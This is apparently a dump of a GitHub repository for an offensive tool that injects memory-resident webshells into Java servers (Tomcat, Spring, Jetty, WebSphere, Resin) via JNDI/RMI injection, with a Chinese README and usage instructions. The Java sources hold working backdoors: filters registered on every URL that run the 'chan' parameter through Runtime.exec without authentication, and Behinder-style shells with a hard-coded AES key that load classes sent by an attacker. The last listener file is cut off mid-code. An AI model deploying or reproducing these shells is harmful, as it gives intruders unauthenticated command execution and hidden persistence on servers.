├── README.md ├── RMI_Inj_MemShell-0.1.2.jar └── lib ├── exploit ├── RmiTest.class ├── RmiTest.java ├── filter │ ├── tomcat10 │ │ ├── FRain10.class │ │ ├── FRain10.java │ │ ├── IFRain10.class │ │ └── IFRain10.java │ └── tomcat89 │ │ ├── FRain.class │ │ ├── FRain.java │ │ ├── IFRain.class │ │ └── IFRain.java ├── listener │ ├── tomcat10 │ │ ├── ILRain10.class │ │ ├── ILRain10.java │ │ ├── LRain10.class │ │ └── LRain10.java │ └── tomcat89 │ │ ├── ILRain.class │ │ ├── ILRain.java │ │ ├── LRain.class │ │ └── LRain.java ├── servlet │ ├── tomcat10 │ │ ├── ISRain10.class │ │ ├── ISRain10.java │ │ ├── SRain10.class │ │ └── SRain10.java │ └── tomcat89 │ │ ├── ISRain.class │ │ ├── ISRain.java │ │ ├── SRain.class │ │ └── SRain.java └── websocket │ ├── BypassNginxCDN │ ├── CmdEndpoint.class │ ├── CmdEndpoint.java │ ├── CmdEndpoint2.class │ ├── CmdEndpoint2.java │ ├── ProxyEndpoint$1.class │ ├── ProxyEndpoint$2.class │ ├── ProxyEndpoint$Attach.class │ ├── ProxyEndpoint.class │ ├── ProxyEndpoint.java │ ├── ProxyEndpoint2$1.class │ ├── ProxyEndpoint2$2.class │ ├── ProxyEndpoint2$Attach.class │ ├── ProxyEndpoint2.class │ └── ProxyEndpoint2.java │ ├── Tomcat_Spring_Jetty │ ├── WebSocket_Proxy.class │ ├── WebSocket_Proxy.java │ ├── WsCmd.class │ └── WsCmd.java │ ├── WebSphere │ ├── ProxyEndpoint$1.class │ ├── ProxyEndpoint$2.class │ ├── ProxyEndpoint$Attach.class │ ├── ProxyEndpoint.class │ ├── ProxyEndpoint.java │ ├── WebsphereEndpoint.class │ └── WebsphereEndpoint.java │ └── resin │ ├── CmdListener.class │ └── CmdListener.java └── web └── web.jar /README.md: -------------------------------------------------------------------------------- 1 | 很多时候打项目的时候会遇到jndi注入用不了ldap协议的情况,但是rmi却可以用,于是诞生了这个工具。 2 | 3 | 4 | 适用于目标用不了ldap的情况 5 | 6 | 懒人专属。 7 | # 2023/01/06 0.1.2版本更新: 8 | 1.增加基于Tomcat、Spring、Jetty、resin、WebSphere的websocket内存马 9 | 10 | 2.增加BypassNginxCDN websocket内存马 11 | 12 | 3.优化使用和其他地方,该版本只有一个jar包,直接启动仓库根目录下的 RMI_Inj_MemShell-0.1.2.jar,根据提示使用就好了 13 | 14 | 内存马项目来自:星火实验室 
https://github.com/veo/wsMemShell 15 | 16 | 界面: 17 | 18 | ![image](https://user-images.githubusercontent.com/45167857/210964163-0cb1e68b-f666-4dd2-af12-a2b2daf8b9d6.png) 19 | 20 | websocket内存马演示: 21 | 22 | ![54905ae1f2ef7447bf555a78535d27b](https://user-images.githubusercontent.com/45167857/210964322-176379ae-10ee-4568-b2c0-4d3483fb6c6f.png) 23 | 24 | 25 | 26 | ----------------分界线----------------- 27 | # 2022/07/18 0.1.1版本更新: 28 | 1.增加冰蝎内存马 29 | 30 | 2.改掉几个bug 31 | 32 | 界面: 33 | 34 | ![3378d89947e69d4909c595bf848c833](https://user-images.githubusercontent.com/45167857/179510427-04cbc1e3-5409-428b-9495-469407fc18d3.png) 35 | 36 | ## 冰蝎内存马演示: 37 | 漏洞环境:springboot+Log4j 38 | 39 | 冰蝎版本:Behinder_v3.0_Beta_11.t00ls 40 | ### servlet: 41 | 5003a275c0325608c12f5c4f352de27 42 | 43 | ### filter: 44 | ![66842c51bb6703956c98b11d6da423c](https://user-images.githubusercontent.com/45167857/179509977-60938a98-ba17-4376-bccc-5e73539352af.png) 45 | 46 | ----------------分界线----------------- 47 | # 2020/07/06 48 | # 0.1版本用法(仅适用于 0.1 版本;0.1.2 起已合并为单个 RMI_Inj_MemShell-0.1.2.jar,见上文): 49 | 把文件全上传到服务器/VPS上 50 | 51 | ## 先启动Log4jWeb-0.0.1: 52 | ```bash 53 | java -jar Log4jWeb-0.0.1.jar 54 | ``` 55 | 56 | ## 然后启动Log4j2Memory-0.1.jar 57 | ```bash 58 | java -jar Log4j2Memory-0.1.jar 59 | ``` 60 | 就可以使用 61 | 62 | 63 | # 工具说明: 64 | 暂时只有三种类型可供选择:filter、Servlet、listener 65 | 66 | 目前暂时只支持注入部分基于tomcat7-8-10环境的内存马(部分springboot等)。lib/exploit 下的内存马按 Servlet API 分为两套:tomcat89 目录(FRain、IFRain、LRain、ILRain 等,import 的是 javax.servlet,对应 Tomcat 8/9),tomcat10 目录(FRain10、IFRain10、LRain10、ILRain10 等,import 的是 jakarta.servlet,对应 Tomcat 10+)。两者包名不同,不能混用,注入前需按目标 Tomcat 版本选择。 67 | 68 | 安全提示:filter/listener 型内存马(FRain、LRain)会把请求参数 chan 的值直接交给 Runtime.exec 执行,没有任何鉴权;冰蝎型内存马(IFRain、ILRain)使用的是编译在类里的固定 AES 密钥(pa 字段),并会在 session 中写入属性 u。也就是说注入之后,任何能访问目标且知道参数名或密钥的人都可以执行命令。仓库中的注入代码只在运行时向 Tomcat 的 StandardContext 注册 filter/listener,不写入磁盘;授权测试结束后应确认内存马已被清理(例如重启目标应用),避免给目标留下无鉴权的后门。 69 | 后续会持续更新内存马 70 | 71 | 效果图(Log4j漏洞演示): 72 | ![1656412703491851573876_62784214476_AA511B22-7E18-43e5-AA76-80E78536408D](https://user-images.githubusercontent.com/45167857/176162994-fa324ab7-a1ba-421a-abdd-2bc5934d3d18.png) 73 | 74 | ![1656412703489851573876_62784406554_C971527D-2BB6-4761-A2F6-DF67E5FA5CF6](https://user-images.githubusercontent.com/45167857/176163024-1dc03080-6435-4db7-b26d-00b5c9be275d.png) 75 | 76 | ![1656412703487851573876_62784295407_85A8F99C-24F3-491f-B56B-AD536D8D43FC](https://user-images.githubusercontent.com/45167857/176163039-bbe39fe6-dc64-4b43-8ec1-76faa37fbbc2.png) 77 | 78 | 
内存马来自项目:https://github.com/ce-automne/TomcatMemShell 79 | 80 | ----------------分界线----------------- 81 | 82 | # 法律 83 | ```bash 84 | 本工具仅能在取得足够合法授权的企业安全建设中使用, 85 | 本工具使用过程中,您应确保自己所有行为符合当地的法律法规。 86 | 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 87 | 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 88 | 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束 89 | ``` 90 | 91 | 92 | ## Stargazers over time 93 | 94 | [![Stargazers over time](https://starchart.cc/novysodope/RMI_Inj_MemShell.svg)](https://starchart.cc/novysodope/RMI_Inj_MemShell) 95 | -------------------------------------------------------------------------------- /RMI_Inj_MemShell-0.1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/RMI_Inj_MemShell-0.1.2.jar -------------------------------------------------------------------------------- /lib/exploit/RmiTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/RmiTest.class -------------------------------------------------------------------------------- /lib/exploit/RmiTest.java: -------------------------------------------------------------------------------- 1 | import java.io.IOException; 2 | 3 | /** 4 | * @Author:novy 5 | * @Date:12:42 2022/6/28 6 | * @Version 1.0 7 | **/ 8 | public class RmiTest { 9 | public static void main( String[] args ) throws Exception { 10 | new RmiTest(); 11 | } 12 | public RmiTest(){ 13 | 14 | } 15 | static { 16 | try { 17 | System.out.println("ok"); 18 | String osName = System.getProperties().getProperty("os.name"); 19 | if (osName.contains("Windows")) { 20 | java.lang.Runtime.getRuntime().exec("calc"); 21 | } 22 | if (osName.contains("Mac OS")){ 23 | String[] cmd = {"/bin/bash", "-c","open 
/System/Applications/Calculator.app/Contents/MacOS/Calculator"}; 24 | java.lang.Runtime.getRuntime().exec(cmd); 25 | } 26 | } catch (IOException e) { 27 | e.printStackTrace(); 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat10/FRain10.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat10/FRain10.class -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat10/FRain10.java: -------------------------------------------------------------------------------- 1 | import jakarta.servlet.*; 2 | import jakarta.servlet.http.HttpServletRequest; 3 | import org.apache.catalina.Context; 4 | import org.apache.catalina.core.ApplicationFilterConfig; 5 | import org.apache.catalina.core.StandardContext; 6 | import org.apache.catalina.loader.WebappClassLoaderBase; 7 | import org.apache.tomcat.util.descriptor.web.FilterDef; 8 | import org.apache.tomcat.util.descriptor.web.FilterMap; 9 | import java.io.IOException; 10 | import java.lang.reflect.Constructor; 11 | import java.lang.reflect.Field; 12 | import java.util.Map; 13 | 14 | public class FRain10 implements Filter { 15 | 16 | static{ 17 | try{ 18 | final String name = "AutomneGreet"; 19 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); 20 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext(); 21 | 22 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs"); 23 | Configs.setAccessible(true); 24 | Map filterConfigs = (Map) Configs.get(standardContext); 25 | 26 | if (filterConfigs.get(name) == null){ 27 | Filter filter = new FRain10(); 28 | 29 | FilterDef filterDef = new 
FilterDef(); 30 | filterDef.setFilter(filter); 31 | filterDef.setFilterName(name); 32 | filterDef.setFilterClass(filter.getClass().getName()); 33 | 34 | standardContext.addFilterDef(filterDef); 35 | 36 | FilterMap filterMap = new FilterMap(); 37 | filterMap.addURLPattern("/*"); 38 | filterMap.setFilterName(name); 39 | filterMap.setDispatcher(DispatcherType.REQUEST.name()); 40 | 41 | standardContext.addFilterMapBefore(filterMap); 42 | 43 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class); 44 | constructor.setAccessible(true); 45 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef); 46 | 47 | filterConfigs.put(name,filterConfig); 48 | } 49 | }catch (Exception hi){ 50 | //hi.printStackTrace(); 51 | } 52 | } 53 | 54 | @Override 55 | public void init(FilterConfig filterConfig) throws ServletException { 56 | 57 | } 58 | 59 | @Override 60 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 61 | HttpServletRequest req = (HttpServletRequest) servletRequest; 62 | if (req.getParameter("chan") != null){ 63 | Process process = Runtime.getRuntime().exec(req.getParameter("chan")); 64 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader( 65 | new java.io.InputStreamReader(process.getInputStream())); 66 | StringBuilder stringBuilder = new StringBuilder(); 67 | String line; 68 | while ((line = bufferedReader.readLine()) != null) { 69 | stringBuilder.append(line + '\n'); 70 | } 71 | servletResponse.getOutputStream().write(stringBuilder.toString().getBytes()); 72 | servletResponse.getOutputStream().flush(); 73 | servletResponse.getOutputStream().close(); 74 | return; 75 | } 76 | filterChain.doFilter(servletRequest,servletResponse); 77 | } 78 | 79 | @Override 80 | public void destroy() { 81 | 82 | } 83 | 84 | } 85 | 86 | 
-------------------------------------------------------------------------------- /lib/exploit/filter/tomcat10/IFRain10.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat10/IFRain10.class -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat10/IFRain10.java: -------------------------------------------------------------------------------- 1 | import jakarta.servlet.*; 2 | import jakarta.servlet.http.HttpServletRequest; 3 | import jakarta.servlet.http.HttpServletResponse; 4 | import jakarta.servlet.http.HttpSession; 5 | import org.apache.catalina.Context; 6 | import org.apache.catalina.core.ApplicationFilterConfig; 7 | import org.apache.catalina.core.StandardContext; 8 | import org.apache.catalina.loader.WebappClassLoaderBase; 9 | import org.apache.tomcat.util.descriptor.web.FilterDef; 10 | import org.apache.tomcat.util.descriptor.web.FilterMap; 11 | 12 | import javax.crypto.Cipher; 13 | import javax.crypto.spec.SecretKeySpec; 14 | import java.io.IOException; 15 | import java.lang.reflect.Constructor; 16 | import java.lang.reflect.Field; 17 | import java.lang.reflect.Method; 18 | import java.util.HashMap; 19 | import java.util.Map; 20 | 21 | public class IFRain10 implements Filter { 22 | private final String pa = "3ad2fddfe8bad8e6"; 23 | 24 | static{ 25 | try{ 26 | final String name = "AutomneGreet"; 27 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); 28 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext(); 29 | 30 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs"); 31 | Configs.setAccessible(true); 32 | Map filterConfigs = (Map) Configs.get(standardContext); 33 | 34 | if 
(filterConfigs.get(name) == null){ 35 | Filter filter = new IFRain10(); 36 | 37 | FilterDef filterDef = new FilterDef(); 38 | filterDef.setFilter(filter); 39 | filterDef.setFilterName(name); 40 | filterDef.setFilterClass(filter.getClass().getName()); 41 | 42 | standardContext.addFilterDef(filterDef); 43 | 44 | FilterMap filterMap = new FilterMap(); 45 | filterMap.addURLPattern("/*"); 46 | filterMap.setFilterName(name); 47 | filterMap.setDispatcher(DispatcherType.REQUEST.name()); 48 | 49 | standardContext.addFilterMapBefore(filterMap); 50 | 51 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class); 52 | constructor.setAccessible(true); 53 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef); 54 | 55 | filterConfigs.put(name,filterConfig); 56 | } 57 | }catch (Exception hi){ 58 | //hi.printStackTrace(); 59 | } 60 | } 61 | 62 | @Override 63 | public void init(FilterConfig filterConfig) throws ServletException { 64 | 65 | } 66 | 67 | @Override 68 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 69 | HttpServletRequest request = (HttpServletRequest) servletRequest; 70 | HttpServletResponse response = (HttpServletResponse) servletResponse; 71 | HttpSession session = request.getSession(); 72 | 73 | Map pageContext = new HashMap(); 74 | pageContext.put("session", session); 75 | pageContext.put("request", request); 76 | pageContext.put("response", response); 77 | 78 | ClassLoader cl = (ClassLoader) Thread.currentThread().getContextClassLoader(); 79 | 80 | if (request.getMethod().equals("POST")) { 81 | if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 82 | Class Lclass = cl.getClass().getSuperclass(); 83 | RushThere(Lclass, cl, session, request, pageContext); 84 | } else if 
(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 85 | Class Lclass = cl.getClass().getSuperclass().getSuperclass(); 86 | RushThere(Lclass, cl, session, request, pageContext); 87 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 88 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass(); 89 | RushThere(Lclass, cl, session, request, pageContext); 90 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 91 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 92 | RushThere(Lclass, cl, session, request, pageContext); 93 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 94 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 95 | RushThere(Lclass, cl, session, request, pageContext); 96 | } else { 97 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 98 | RushThere(Lclass, cl, session, request, pageContext); 99 | } 100 | filterChain.doFilter(servletRequest, servletResponse); 101 | } 102 | } 103 | 104 | @Override 105 | public void destroy() { 106 | 107 | } 108 | 109 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){ 110 | byte[] bytecode = java.util.Base64.getDecoder().decode("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"); 111 | try { 112 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 113 | define.setAccessible(true); 114 | Class uclass = null; 115 | try { 116 | uclass = cl.loadClass("U"); 117 | } catch (ClassNotFoundException e) { 118 | 
uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length); 119 | } 120 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class); 121 | constructor.setAccessible(true); 122 | Object u = constructor.newInstance(this.getClass().getClassLoader()); 123 | Method Um = uclass.getDeclaredMethod("g", byte[].class); 124 | Um.setAccessible(true); 125 | String k = pa; 126 | session.setAttribute("u", k); 127 | Cipher c = Cipher.getInstance("AES"); 128 | c.init(2, new SecretKeySpec(k.getBytes(), "AES")); 129 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())); 130 | Class eclass = (Class) Um.invoke(u, eClassBytes); 131 | Object a = eclass.newInstance(); 132 | Method b = eclass.getDeclaredMethod("equals", Object.class); 133 | b.setAccessible(true); 134 | b.invoke(a, pageContext); 135 | return; 136 | }catch (Exception ig){ 137 | //ig.printStackTrace(); 138 | } 139 | } 140 | 141 | } 142 | 143 | 144 | -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat89/FRain.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat89/FRain.class -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat89/FRain.java: -------------------------------------------------------------------------------- 1 | import org.apache.catalina.Context; 2 | import org.apache.catalina.core.ApplicationFilterConfig; 3 | import org.apache.catalina.core.StandardContext; 4 | import org.apache.catalina.loader.WebappClassLoaderBase; 5 | import org.apache.tomcat.util.descriptor.web.FilterDef; 6 | import org.apache.tomcat.util.descriptor.web.FilterMap; 7 | 8 | import javax.servlet.*; 9 | import javax.servlet.http.HttpServletRequest; 10 | import java.io.IOException; 11 | import 
java.lang.reflect.Constructor; 12 | import java.lang.reflect.Field; 13 | import java.util.Map; 14 | 15 | public class FRain implements Filter{ 16 | 17 | static{ 18 | try{ 19 | final String name = "AutomneGreet"; 20 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); 21 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext(); 22 | 23 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs"); 24 | Configs.setAccessible(true); 25 | Map filterConfigs = (Map) Configs.get(standardContext); 26 | 27 | if (filterConfigs.get(name) == null){ 28 | Filter filter = new FRain(); 29 | 30 | FilterDef filterDef = new FilterDef(); 31 | filterDef.setFilter(filter); 32 | filterDef.setFilterName(name); 33 | filterDef.setFilterClass(filter.getClass().getName()); 34 | 35 | standardContext.addFilterDef(filterDef); 36 | 37 | FilterMap filterMap = new FilterMap(); 38 | filterMap.addURLPattern("/*"); 39 | filterMap.setFilterName(name); 40 | filterMap.setDispatcher(DispatcherType.REQUEST.name()); 41 | 42 | standardContext.addFilterMapBefore(filterMap); 43 | 44 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class); 45 | constructor.setAccessible(true); 46 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef); 47 | 48 | filterConfigs.put(name,filterConfig); 49 | } 50 | }catch (Exception hi){ 51 | //hi.printStackTrace(); 52 | } 53 | } 54 | 55 | @Override 56 | public void init(FilterConfig filterConfig) throws ServletException { 57 | 58 | } 59 | 60 | @Override 61 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 62 | HttpServletRequest req = (HttpServletRequest) servletRequest; 63 | if (req.getParameter("chan") != 
null){ 64 | Process process = Runtime.getRuntime().exec(req.getParameter("chan")); 65 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader( 66 | new java.io.InputStreamReader(process.getInputStream())); 67 | StringBuilder stringBuilder = new StringBuilder(); 68 | String line; 69 | while ((line = bufferedReader.readLine()) != null) { 70 | stringBuilder.append(line + '\n'); 71 | } 72 | servletResponse.getOutputStream().write(stringBuilder.toString().getBytes()); 73 | servletResponse.getOutputStream().flush(); 74 | servletResponse.getOutputStream().close(); 75 | return; 76 | } 77 | filterChain.doFilter(servletRequest,servletResponse); 78 | } 79 | 80 | @Override 81 | public void destroy() { 82 | 83 | } 84 | 85 | } 86 | -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat89/IFRain.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat89/IFRain.class -------------------------------------------------------------------------------- /lib/exploit/filter/tomcat89/IFRain.java: -------------------------------------------------------------------------------- 1 | import org.apache.catalina.Context; 2 | import org.apache.catalina.core.ApplicationFilterConfig; 3 | import org.apache.catalina.core.StandardContext; 4 | import org.apache.catalina.loader.WebappClassLoaderBase; 5 | import org.apache.tomcat.util.descriptor.web.FilterDef; 6 | import org.apache.tomcat.util.descriptor.web.FilterMap; 7 | 8 | import javax.crypto.Cipher; 9 | import javax.crypto.spec.SecretKeySpec; 10 | import javax.servlet.*; 11 | import javax.servlet.http.HttpServletRequest; 12 | import javax.servlet.http.HttpServletResponse; 13 | import javax.servlet.http.HttpSession; 14 | import java.io.IOException; 15 | import java.lang.reflect.Constructor; 16 | import java.lang.reflect.Field; 
17 | import java.lang.reflect.Method; 18 | import java.util.HashMap; 19 | import java.util.Map; 20 | 21 | public class IFRain implements Filter{ 22 | private final String pa = "3ad2fddfe8bad8e6"; 23 | 24 | static{ 25 | try{ 26 | final String name = "AutomneGreet"; 27 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); 28 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext(); 29 | 30 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs"); 31 | Configs.setAccessible(true); 32 | Map filterConfigs = (Map) Configs.get(standardContext); 33 | 34 | if (filterConfigs.get(name) == null){ 35 | Filter filter = new IFRain(); 36 | 37 | FilterDef filterDef = new FilterDef(); 38 | filterDef.setFilter(filter); 39 | filterDef.setFilterName(name); 40 | filterDef.setFilterClass(filter.getClass().getName()); 41 | 42 | standardContext.addFilterDef(filterDef); 43 | 44 | FilterMap filterMap = new FilterMap(); 45 | filterMap.addURLPattern("/*"); 46 | filterMap.setFilterName(name); 47 | filterMap.setDispatcher(DispatcherType.REQUEST.name()); 48 | 49 | standardContext.addFilterMapBefore(filterMap); 50 | 51 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class); 52 | constructor.setAccessible(true); 53 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef); 54 | 55 | filterConfigs.put(name,filterConfig); 56 | } 57 | }catch (Exception hi){ 58 | //hi.printStackTrace(); 59 | } 60 | } 61 | 62 | @Override 63 | public void init(FilterConfig filterConfig) throws ServletException { 64 | 65 | } 66 | 67 | @Override 68 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 69 | HttpServletRequest request = 
(HttpServletRequest) servletRequest; 70 | HttpServletResponse response = (HttpServletResponse) servletResponse; 71 | HttpSession session = request.getSession(); 72 | 73 | Map pageContext = new HashMap(); 74 | pageContext.put("session", session); 75 | pageContext.put("request", request); 76 | pageContext.put("response", response); 77 | 78 | ClassLoader cl = (ClassLoader) Thread.currentThread().getContextClassLoader(); 79 | 80 | if (request.getMethod().equals("POST")) { 81 | if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 82 | Class Lclass = cl.getClass().getSuperclass(); 83 | RushThere(Lclass, cl, session, request, pageContext); 84 | } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 85 | Class Lclass = cl.getClass().getSuperclass().getSuperclass(); 86 | RushThere(Lclass, cl, session, request, pageContext); 87 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 88 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass(); 89 | RushThere(Lclass, cl, session, request, pageContext); 90 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 91 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 92 | RushThere(Lclass, cl, session, request, pageContext); 93 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) { 94 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 95 | RushThere(Lclass, cl, session, request, pageContext); 96 | } else { 97 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 98 | RushThere(Lclass, cl, session, request, pageContext); 99 | 
} 100 | filterChain.doFilter(servletRequest, servletResponse); 101 | } 102 | } 103 | 104 | @Override 105 | public void destroy() { 106 | 107 | } 108 | 109 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){ 110 | byte[] bytecode = java.util.Base64.getDecoder().decode("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"); 111 | try { 112 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 113 | define.setAccessible(true); 114 | Class uclass = null; 115 | try { 116 | uclass = cl.loadClass("U"); 117 | } catch (ClassNotFoundException e) { 118 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length); 119 | } 120 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class); 121 | constructor.setAccessible(true); 122 | Object u = constructor.newInstance(this.getClass().getClassLoader()); 123 | Method Um = uclass.getDeclaredMethod("g", byte[].class); 124 | Um.setAccessible(true); 125 | String k = pa; 126 | session.setAttribute("u", k); 127 | Cipher c = Cipher.getInstance("AES"); 128 | c.init(2, new SecretKeySpec(k.getBytes(), "AES")); 129 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())); 130 | Class eclass = (Class) Um.invoke(u, eClassBytes); 131 | Object a = eclass.newInstance(); 132 | Method b = eclass.getDeclaredMethod("equals", Object.class); 133 | b.setAccessible(true); 134 | b.invoke(a, pageContext); 135 | return; 136 | }catch (Exception ig){ 137 | //ig.printStackTrace(); 138 | } 139 | } 140 | 141 | } 142 | 143 | -------------------------------------------------------------------------------- /lib/exploit/listener/tomcat10/ILRain10.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat10/ILRain10.class -------------------------------------------------------------------------------- /lib/exploit/listener/tomcat10/ILRain10.java: -------------------------------------------------------------------------------- 1 | import jakarta.servlet.ServletRequestEvent; 2 | import jakarta.servlet.ServletRequestListener; 3 | import jakarta.servlet.http.HttpServletRequest; 4 | import jakarta.servlet.http.HttpSession; 5 | import org.apache.catalina.connector.Request; 6 | import org.apache.catalina.connector.RequestFacade; 7 | import org.apache.catalina.connector.Response; 8 | import org.apache.catalina.core.StandardContext; 9 | import org.apache.catalina.loader.WebappClassLoaderBase; 10 | 11 | import javax.crypto.Cipher; 12 | import javax.crypto.spec.SecretKeySpec; 13 | import java.lang.reflect.Constructor; 14 | import java.lang.reflect.Field; 15 | import java.lang.reflect.Method; 16 | import java.util.HashMap; 17 | import java.util.Map; 18 | 19 | public class ILRain10 implements ServletRequestListener { 20 | private final String pa = "3ad2fddfe8bad8e6"; 21 | 22 | static { 23 | try { 24 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); 25 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext(); 26 | 27 | ILRain10 servletRequestListener = new ILRain10(); 28 | Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class); 29 | addlistener.invoke(standardContext,servletRequestListener); 30 | 31 | } catch (Exception hi) { 32 | //hi.printStackTrace(); 33 | } 34 | } 35 | 36 | 37 | @Override 38 | public void requestDestroyed(ServletRequestEvent servletRequestEvent) { 39 | 40 | } 41 | @Override 42 | public void requestInitialized(ServletRequestEvent 
